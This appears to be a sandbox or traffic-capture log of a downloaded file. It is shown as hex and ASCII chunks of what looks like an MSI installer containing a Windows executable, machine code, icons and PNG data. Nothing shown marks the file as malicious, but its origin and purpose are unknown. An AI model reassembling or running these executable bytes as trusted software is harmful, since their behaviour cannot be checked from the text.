2022-04-20 07:18:55 UTC1INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: >
2022-04-20 07:18:55 UTC17INData Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 0c 02 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 28 01 00 00 03 00 00 00 90 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00 0e 00 00 00 f0 00 00 00 0f 00 00 00 f8 00 00 00 12 00 00 00 ec 01 00 00 13 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 49 6e 73 74 61 6c 6c 65 72 00 00 00 1e 00 00 00 0b 00 00 00 49 6e 74 65 6c 3b 31 30 33 33 00 00 1e 00 00 00 27 00 00 00 7b 34 39 38 32 41 36 31 43 2d 39 34 36 44 2d 34 31 36 38 2d 38 30 39 43 2d 31 33 46 46 39 39
Data Ascii: Oh+'0x(InstallerIntel;1033'{4982A61C-946D-4168-809C-13FF99
2022-04-20 07:18:55 UTC33INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fe ae 1e ec ba cf 70 bf ba cf 70 bf ba cf 70 bf b3 b7 f4 bf fa cf 70 bf b3 b7 e5 bf af cf 70 bf b3 b7 f3 bf 2f cf 70 bf 9d 09 0b bf b5 cf 70 bf ba cf 71 bf 25 cf 70 bf b3 b7 fa bf b7 cf 70 bf b3 b7 e2 bf bb cf 70 bf b3 b7 e1 bf bb cf 70 bf 52 69 63 68 ba cf 70 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ee dc 2e 60 00 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ppppp/ppq%ppppRichpPEL.`
2022-04-20 07:18:55 UTC49INData Raw: 50 83 ec 08 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 5d 08 e8 58 a1 00 00 8b f0 33 c0 89 75 ec 89 43 08 89 43 10 89 43 14 89 45 fc e8 3e b8 01 00 8b 7e 08 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 cc a1 00 00 83 c4 04 8b c8 8d 9b 00 00 00 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 08 e8 04 b8 01 00 bf 60 a6 02 10 8b c7 8d 50 01 90 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 8f a1 00 00 83 c4 04 8b c8 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 10 e8 cd b7 01 00 bf 68 a6 02 10 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 59 a1 00 00 83 c4 04 8b c8 8d 49 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 14 c7 45 fc ff ff ff ff e8 8d b7 01 00 8b 75 ec 8b 06 8a 08 88 4b 0c e8 7e b7 01 00 8b 56 04 8a
Data Ascii: PSVW`3PEde]X3uCCCE>~P@u+pVvNAGC`P@u+pVvNAGChP@u+pVYIvNAGCEuK~V
2022-04-20 07:18:55 UTC65INData Raw: e8 1b 81 ff ff 8b 45 ec 3b c3 74 07 50 ff 15 38 80 02 10 8b 45 e8 3b c3 74 08 53 50 ff 15 34 80 02 10 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b d1 8b 4a 04 83 79 f4 00 75 06 32 c0 8b e5 5d c3 e8 04 00 00 00 8b e5 5d c3 55 8b ec 6a ff 68 08 70 02 10 64 a1 00 00 00 00 50 83 ec 0c 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b fa b9 08 c1 02 10 e8 7a 01 00 00 8d 45 f0 50 8b cf e8 ff fe ff ff c7 45 fc 00 00 00 00 8b 75 f0 b9 08 c1 02 10 e8 5b 01 00 00 6a 04 68 08 c1 02 10 57 e8 0e f7 ff ff 6a 01 68 08 a9 02 10 57 e8 01 f7 ff ff 85 f6 75 04 33 c0 eb 18 8b c6 8d 50 02 8d 64 24 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 50 56 57 e8 d9 f6 ff ff 6a 01 68 04 c1 02 10 57
Data Ascii: E;tP8E;tSP4MdY_^[]UJyu2]]UjhpdPSVW`3PEdzEPEu[jhWjhWu3Pd$ffu+PVWjhW
2022-04-20 07:18:55 UTC81INData Raw: 00 00 80 e8 08 06 00 00 83 c4 10 c6 45 fc 03 8b 55 e8 83 7a f4 00 75 51 8b 45 ec 68 b4 c7 02 10 50 8d 4d e0 56 bb 40 00 00 00 51 8b d3 b9 02 00 00 80 e8 d9 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 04 e8 fa 82 ff ff c6 45 fc 03 8b 45 e0 83 c0 f0 8d 50 0c 83 c9 ff f0 0f c1 0a 49 85 c9 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 75 4e 8b 55 ec 68 b4 c7 02 10 52 8d 45 dc 56 50 33 d2 b9 01 00 00 80 33 db e8 82 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 05 e8 a3 82 ff ff c6 45 fc 03 8b 45 dc 83 c0 f0 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 0f 84 89 01 00 00 8b 45 10 85 db 75 29 85 c0 75 13 8b 55 f0 53 52 68 01 00 00 80 8b de e8 07 0b 00 00 eb 3f 83 f8 01 75 3d 8b 45 ec 6a 00 50 68 01 00 00 80 eb 26 85 c0
Data Ascii: EUzuQEhPMV@Q}EEEPIPBMyuNUhREVP33}EEEHJPBMyEu)uUSRh?u=EjPh&
2022-04-20 07:18:55 UTC97INData Raw: 34 83 c0 10 6b c0 14 50 ff 35 7c 45 03 10 57 ff 35 14 2a 03 10 ff 15 68 81 02 10 3b c7 75 04 33 c0 eb 78 83 05 88 45 03 10 10 8b 35 78 45 03 10 a3 7c 45 03 10 6b f6 14 03 35 7c 45 03 10 68 c4 41 00 00 6a 08 ff 35 14 2a 03 10 ff 15 60 81 02 10 89 46 10 3b c7 74 c7 6a 04 68 00 20 00 00 68 00 00 10 00 57 ff 15 64 81 02 10 89 46 0c 3b c7 75 12 ff 76 10 57 ff 35 14 2a 03 10 ff 15 24 81 02 10 eb 9b 83 4e 08 ff 89 3e 89 7e 04 ff 05 78 45 03 10 8b 46 10 83 08 ff 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 64 81 02 10 85 c0 75 08 83 c8 ff
Data Ascii: 4kP5|EW5*h;u3xE5xE|Ek5|EhAj5*`F;tjh hWdF;uvW5*$N>~xEF_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWdu
2022-04-20 07:18:55 UTC113INData Raw: ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 51 a3 ff ff 83 c4 14 83 c8 ff e9 06 02 00 00 66 39 30 74 db 53 8b 5d 10 3b de 74 0b 8b 03 3b c6 74 05 66 39 30 75 20 e8 6d b6 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 19 a3 ff ff 83 c4 14 83 c8 ff e9 cd 01 00 00 e8 4d b6 ff ff 8b 00 89 45 ec e8 43 b6 ff ff ff 75 14 89 30 53 ff 75 0c ff 75 08 e8 2c 02 00 00 83 c4 10 89 45 f4 83 f8 ff 0f 85 6f 01 00 00 e8 1e b6 ff ff 83 38 02 0f 85 61 01 00 00 6a 2f ff 75 0c e8 e0 77 00 00 59 59 85 c0 0f 85 4d 01 00 00 68 74 85 02 10 8d 45 fc 56 50 e8 30 05 00 00 83 c4 0c 3b c6 74 1b 83 f8 16 0f 85 2e 01 00 00 56 56 56 56 56 e8 6c a1 ff ff 83 c4 14 e9 1c 01 00 00 39 75 fc 0f 84 13 01 00 00 6a 02 bb 04 01 00 00 53 e8 96 10 00 00 8b f8 59 59 3b fe 0f 84 fa 00 00 00 68 03 01 00 00 57
Data Ascii: VVVVVQf90tS];t;tf90u mVVVVVMECu0Suu,Eo8aj/uwYYMhtEVP0;t.VVVVVl9ujSYY;hW
2022-04-20 07:18:55 UTC129INData Raw: 59 01 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 48 04 00 00 0f b6 70 02 0f b6 59 02 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 27 04 00 00 0f b6 70 03 0f b6 59 03 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 02 04 00 00 8b 70 04 3b 71 04 74 7e 0f b6 70 04 0f b6 59 04 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 d9 03 00 00 0f b6 70 05 0f b6 59 05 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 b8 03 00 00 0f b6 70 06 0f b6 59 06 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 97 03 00 00 0f b6 70 07 0f b6 59 07 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 72 03 00 00 8b 70 08 3b 71 08 74 7e 0f b6 70 08 0f b6
Data Ascii: Y+t3\HpY+t3\'pY+t3\3p;qt~pY+t3\pY+t3\pY+t3\pY+t3\3rp;qt~p
2022-04-20 07:18:55 UTC145INData Raw: 38 5d fc 74 07 8b 4d f8 83 61 70 fd 5e 5f 5b c9 c3 8b ff 55 8b ec 53 57 33 ff 39 3d 74 2b 03 10 75 7d 8b 5d 08 3b df 75 1f e8 79 36 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 25 23 ff ff 83 c4 14 b8 ff ff ff 7f eb 69 8b 55 0c 3b d7 74 da 81 7d 10 ff ff ff 7f 77 d1 0f b7 03 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 0f b7 c8 0f b7 02 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 43 43 42 42 ff 4d 10 0f b7 c0 74 0a 66 3b cf 74 05 66 3b c8 74 c3 0f b7 d0 0f b7 c1 2b c2 eb 12 57 ff 75 10 ff 75 0c ff 75 08 e8 20 fe ff ff 83 c4 10 5f 5b 5d c3 8b ff 55 8b ec 51 51 53 56 8b 35 dc 2b 03 10 33 db 89 5d fc 8b 06 57 3b c3 74 50 8b 3d 90 80 02 10 53 53 6a ff 50 53 53 ff d7 89 45 f8 3b c3 74 41 6a 02 50 e8 95 90 ff ff 59 59 89 45 fc 3b c3 74 30 ff 75 f8 50 6a ff ff 36
Data Ascii: 8]tMap^_[USW39=t+u}];uy6WWWWW%#iU;t}wfArfZw fArfZw CCBBMtf;tf;t+Wuuu _[]UQQSV5+3]W;tP=SSjPSSE;tAjPYYE;t0uPj6
2022-04-20 07:18:55 UTC161INData Raw: 02 10 8b ff 55 8b ec 51 53 8b 45 0c 83 c0 0c 89 45 fc 64 8b 1d 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 66 1c 02 10 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 96 ff ff ff 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 96 0f 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 7b dc fe ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 59 0f 00 00 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec
Data Ascii: UQSEEddE]mc[XY$UQQSVWd5uEfjuuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3{jVvvjuvuY ^]U
2022-04-20 07:18:55 UTC177INData Raw: 83 ce 08 a9 00 04 00 00 74 03 83 ce 04 a9 00 08 00 00 74 03 83 ce 02 a9 00 10 00 00 74 03 83 ce 01 a9 00 01 00 00 74 06 81 ce 00 00 08 00 8b c8 bb 00 60 00 00 23 cb 74 2a 81 f9 00 20 00 00 74 1c 81 f9 00 40 00 00 74 0c 3b cb 75 16 81 ce 00 03 00 00 eb 0e 81 ce 00 02 00 00 eb 06 81 ce 00 01 00 00 bf 40 80 00 00 23 c7 83 e8 40 74 1c 2d c0 7f 00 00 74 0d 83 e8 40 75 16 81 ce 00 00 00 01 eb 0e 81 ce 00 00 00 03 eb 06 81 ce 00 00 00 02 8b 45 ec 8b d0 23 45 08 f7 d2 23 d6 0b d0 3b d6 75 07 8b c6 e9 b0 00 00 00 e8 16 fd ff ff 50 89 45 f4 e8 8a 02 00 00 59 0f ae 5d f4 8b 4d f4 33 d2 84 c9 79 03 6a 10 5a f7 c1 00 02 00 00 74 03 83 ca 08 f7 c1 00 04 00 00 74 03 83 ca 04 f7 c1 00 08 00 00 74 03 83 ca 02 f7 c1 00 10 00 00 74 03 83 ca 01 be 00 01 00 00 85 ce 74 06 81
Data Ascii: tttt`#t* t@t;u@#@t-t@uE#E#;uPEY]M3yjZttttt
2022-04-20 07:18:55 UTC193INData Raw: 50 9d 02 10 47 42 52 00 64 9c 02 10 47 42 52 00 54 9c 02 10 55 53 41 00 4c 9d 02 10 55 53 41 00 0c 0c 1a 0c 07 10 36 04 0c 08 2d 04 03 04 0c 10 10 08 1d 08 30 00 00 00 4f 43 50 00 41 43 50 00 4e 6f 72 77 65 67 69 61 6e 2d 4e 79 6e 6f 72 73 6b 00 00 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 00 00 00 00 47 65 74 50 72 6f 63 65 73 73 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 00 47 65 74 55 73 65 72 4f 62 6a 65 63 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00
Data Ascii: PGBRdGBRTUSALUSA6-0OCPACPNorwegian-NynorskEEE00P('8PW700PP (`h`hhhxppwppSystemRootGetProcessWindowStationGetUserObjectInformationA
2022-04-20 07:18:55 UTC209INData Raw: 00 00 00 00 01 00 00 00 0c e4 02 10 14 e4 02 10 00 00 00 00 58 22 03 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 fc e3 02 10 74 22 03 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c4 e3 02 10 00 00 00 00 d0 23 01 00 e4 80 01 00 68 ed 01 00 c5 1c 02 00 cf 1d 02 00 c8 5f 02 00 ee 5f 02 00 1c 60 02 00 49 60 02 00 6c 60 02 00 87 60 02 00 b0 60 02 00 d8 60 02 00 34 61 02 00 84 61 02 00 a0 61 02 00 cb 61 02 00 f8 61 02 00 28 62 02 00 58 62 02 00 c1 62 02 00 04 63 02 00 40 63 02 00 88 63 02 00 d0 63 02 00 18 64 02 00 4b 64 02 00 89 64 02 00 b8 64 02 00 e8 64 02 00 18 65 02 00 48 65 02 00 8b 65 02 00 c9 65 02 00 09 66 02 00 52 66 02 00 a1 66 02 00 e2 66 02 00 29 67 02 00 88 67 02 00 c8 67 02 00 f8 67 02 00 30 68 02 00 58 68 02
Data Ascii: X"@t"@#h__`I`l````4aaaaa(bXbbc@cccdKddddeHeeefRfff)gggg0hXh
2022-04-20 07:18:55 UTC225INData Raw: 00 00 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 04 bf c9 1b 8e 34 40 00 00 00 a1 ed cc ce 1b c2 d3 4e 40 20 f0 9e b5 70 2b a8 ad c5 9d 69 40 d0 5d fd 25 e5 1a 8e 4f 19 eb 83 40 71 96 d7 95 43 0e 05 8d 29 af 9e 40 f9 bf a0 44 ed 81 12 8f 81 82 b9 40 bf 3c d5 a6 cf ff 49 1f 78 c2 d3 40 6f c6 e0 8c e9 80 c9 47 ba 93 a8 41 bc 85 6b 55 27 39 8d f7 70 e0 7c 42 bc dd 8e de f9 9d fb eb 7e aa 51 43 a1 e6 76 e3 cc f2 29 2f 84 81 26 44 28 10 17 aa f8 ae 10 e3 c5 c4 fa 44 eb a7 d4 f3 f7 eb e1 4a 7a 95 cf 45 65 cc c7 91 0e a6 ae a0 19 e3 a3 46 0d 65 17 0c 75 81 86 75 76 c9 48 4d 58 42 e4 a7 93 39 3b 35 b8 b2 ed 53 4d a7 e5 5d 3d c5 5d 3b 8b 9e 92 5a ff 5d a6
Data Ascii: P@$@@ @4@N@ p+i@]%O@qC)@D@<Ix@oGAkU'9p|B~QCv)/&D(DJzEeFeuuvHMXB9;5SM]=];Z]
2022-04-20 07:18:55 UTC241INData Raw: 00 00 01 00 0d 00 30 30 10 00 01 00 04 00 68 06 00 00 d6 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 3e 07 00 00 18 18 10 00 01 00 04 00 e8 01 00 00 26 0a 00 00 10 10 10 00 01 00 04 00 28 01 00 00 0e 0c 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 36 0d 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 de 1b 00 00 18 18 00 00 01 00 08 00 c8 06 00 00 86 24 00 00 10 10 00 00 01 00 08 00 68 05 00 00 4e 2b 00 00 00 00 00 00 01 00 20 00 d2 d9 00 00 b6 30 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 88 0a 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 30 30 01 00 18 18 00 00 01 00 20 00 88 09 00 00 d8 40 01 00 10 10 00 00 01 00 20 00 68 04 00 00 60 4a 01 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: 00h >&(006 $hN+ 000 % 00 @ h`J(0`
2022-04-20 07:18:55 UTC257INData Raw: 0a 03 09 51 15 00 00 ff 04 2c 35 42 40 2e 0a 0a 0a 03 09 0a 15 00 00 03 03 03 03 03 03 03 03 03 03 03 09 0a 15 00 00 00 04 06 06 06 06 06 06 09 09 09 09 0a 15 00 00 00 04 51 39 39 39 39 39 39 39 39 39 51 15 00 00 00 15 15 15 15 15 15 15 15 15 15 15 15 12 00 00 04 00 2a 13 13 13 13 13 13 13 13 13 3a 00 04 00 00 00 47 47 47 47 47 47 47 47 47 47 47 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 c0 01 00 00 c0 01 00 00 c0 01 00 00 a0 02 00 00 e0 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ec bd 79 ac 2c d9 7d df f7 39 e7 d4 d2 eb dd de 36 6f de bc 19 ce 0c 87 9b 44 91 22 47 a2
Data Ascii: Q,5B@.Q999999999Q*:GGGGGGGGGGGPNGIHDR\rf IDATxy,}96oD"G
2022-04-20 07:18:55 UTC273INData Raw: 24 5e e6 0a 37 c2 e2 59 30 46 0d 05 58 6d 9a e8 c4 2d 1b 4d 93 94 34 d5 18 0b 7b c7 2d 52 ed 12 4e 28 4f 21 90 08 2b 90 08 3c 2f 20 f4 7d 82 d0 c3 0f 14 be a7 86 29 a6 83 c0 73 06 d0 7a c5 2d 3d f5 9c 57 c2 1a 43 9c 24 a4 71 44 92 c4 1c b7 0f b1 46 43 d2 46 58 1f 21 2c 81 02 4f 42 e0 09 94 04 4f 81 12 16 25 41 65 be f9 22 08 49 38 db 43 ee b3 2f 83 dc 3d 45 ca 7a bd b0 36 f3 23 e4 28 96 80 1e 29 33 a2 06 d8 d1 77 38 ca 48 26 be b6 e2 9a d5 d4 ef ff 13 f4 c5 ff 1c 1d 3c 31 a5 f0 69 74 52 cd f8 76 a0 c7 22 12 70 de 19 ff b4 ce 6e 6d 6d c5 4a a9 21 03 00 46 c4 f9 dc f5 57 3e 9f eb fe d3 ac ba e3 6a 83 db b8 42 b2 75 e9 09 3c df 63 d0 eb 71 bc 7b c8 e6 a5 f3 54 2b 55 a2 38 21 d1 31 42 09 a4 ca 0c 5e 3e 66 2c 58 00 00 20 00 49 44 41 54 c6 a2 85 73 85 09 03 56
Data Ascii: $^7Y0FXm-M4{-RN(O!+</ })sz-=WC$qDFCFX!,OBO%Ae"I8C/=Ez6#()3w8H&<1itRv"pnmmJ!FW>jBu<cq{T+U8!1B^>f,X IDATsV
2022-04-20 07:18:55 UTC289INData Raw: 55 b0 00 9c 0f 85 58 4a 13 fc 77 13 b2 3b 5b e4 de 7e a5 5e d2 dc dd ac 40 9f f9 5b 66 ef 0a 8a dd 98 40 72 27 0e 59 66 ef 02 dd 45 08 dc 77 03 d1 7b c1 01 bc 4a 53 c2 97 4e 1a d1 da d5 75 1d b0 2a 7b 7e 79 db d0 c1 39 03 74 a3 f8 4a 1d 1d 1d 9d 3b 6b 1a 6b 1c eb f5 9a 2c cb 76 52 67 5d a6 e9 fa f9 69 59 a2 ee ef fb 6e 81 8b 02 48 f4 d6 0f bd f9 bd 8b 23 b2 9d 0f 7d 08 3a d7 e6 bd 67 bd 5e f3 ed 6f 7f 9b d5 6a c5 f3 e7 cf 19 8f c7 e4 59 86 2e 32 f2 a3 11 72 90 63 44 68 2d 96 67 90 8f 35 62 a0 29 ca 01 d2 87 1e 80 5a 6b ca b2 dc 39 bf ad 20 50 8a b2 1c 30 c8 0a 6a b1 0a 26 7e 27 f6 91 4e a8 bb 5d 97 c9 fb 50 dc 43 cb 76 ef c7 ee e3 4c 31 93 d4 99 c8 98 06 b3 5e 32 1c 54 64 3a c7 3a 87 b1 21 38 a7 62 5f c3 d4 35 28 59 65 ad 29 df c2 76 db 28 63 2b 2c fa cc
Data Ascii: UXJw;[~^@[f@r'YfEw{JSNu*{~y9tJ;kk,vRg]iYnH#}:g^ojY.2rcDh-g5b)Zk9 P0j&~'N]PCvL1^2Td::!8b_5(Ye)v(c+,
2022-04-20 07:18:55 UTC305INData Raw: 05 45 d3 e9 d2 b5 0b 4b 13 b2 6c c0 60 30 60 34 1a 32 1a 0d d9 db bb c4 78 bc c3 72 b5 e0 e8 f0 88 d3 e9 a9 af 87 6f 98 9e 9c b0 9c cf 89 a2 94 24 8d bd 65 91 91 a6 a9 4b 71 96 0e 29 c7 27 cf 28 19 e2 f7 6b 8d d8 18 8d c0 cd fa d3 ae 35 12 da 18 f2 bc e2 68 7a cc ed fb f7 b8 3f 3d a2 aa 0b 94 90 8c 64 c2 64 30 64 9c 66 a4 49 06 89 e4 be 5e 72 6f 7e cc d1 62 ee 42 9d 52 b5 80 a2 c1 e1 0b c1 05 b0 04 79 60 31 62 ad c9 37 ec 83 c0 fc 3e 04 10 f4 b6 41 b4 b8 a7 05 a4 12 ad af 6f b0 9c 34 c7 3c 1b 3d b7 3e d2 03 19 5f b4 ef c3 b5 70 8f cd b0 e1 a6 fb d0 59 e3 b9 18 40 18 16 ab 59 2c 56 94 65 41 5d 57 3e cb f2 7c 80 cf 45 2d 60 30 18 b3 b3 b3 cb 70 38 72 c0 b1 cf 8d 88 63 98 4c 76 e3 9d 9d 89 c5 e1 57 09 8e e9 97 38 01 10 80 bf a0 f5 b7 e5 f3 5f 98 1e d7 c5 7e
Data Ascii: EKl`0`42xro$eKq)'(k5hz?=dd0dfI^ro~bBRy`1b7>Ao4<=>_pY@Y,VeA]W>|E-`0p8rcLvW8_~
2022-04-20 07:18:55 UTC321INData Raw: ff 00 00 00 01 ff 00 00 ff 00 00 00 01 7f 00 00 d7 c6 00 00 03 3f 00 00 ff c6 00 00 03 ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 bf b7 0f b2 c2 c6 39 bc c8 cd 72 bc cc dc b0 c5 d0 d8 df 87 87 86 5e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 c5 be
Data Ascii: ?( @ 9r^
2022-04-20 07:18:56 UTC337INData Raw: c8 45 33 c9 33 c9 83 f8 7f 0f 87 1e 02 00 00 45 8b c6 41 8b d6 ff 15 d1 67 00 00 48 8b c8 48 89 05 5f 9c 00 00 ff 15 51 67 00 00 44 8d 47 04 48 8d 15 7a b2 00 00 48 8d 0d 5f 6c 00 00 e8 ca 20 00 00 85 c0 75 2d 21 7c 24 28 45 33 c9 45 33 c0 33 c9 ba b1 04 00 00 c7 44 24 20 10 00 00 00 e8 58 1e 00 00 c7 05 22 a9 00 00 14 07 07 80 e9 d3 01 00 00 8b 05 37 b2 00 00 a8 40 75 08 84 c0 0f 89 b8 00 00 00 41 b8 04 01 00 00 48 8d 54 24 30 48 8d 0d 15 6c 00 00 e8 70 20 00 00 33 c9 85 c0 75 0c 21 7c 24 28 45 33 c9 45 33 c0 eb a4 4c 8d 44 24 30 41 8b d6 ff 15 70 66 00 00 48 89 05 b9 9b 00 00 48 85 c0 74 75 ff 15 6e 65 00 00 3d b7 00 00 00 75 68 45 33 c9 4c 8d 05 e5 a8 00 00 33 c9 f6 05 c8 b1 00 00 80 74 18 21 7c 24 28 ba 4b 05 00 00 c7 44 24 20 10 00 00 00 e8 bc 1d 00
Data Ascii: E33EAgHH_QgDGHzH_l u-!|$(E3E33D$ X"7@uAHT$0Hlp 3u!|$(E3E3LD$0ApfHHtune=uhE3L3t!|$(KD$
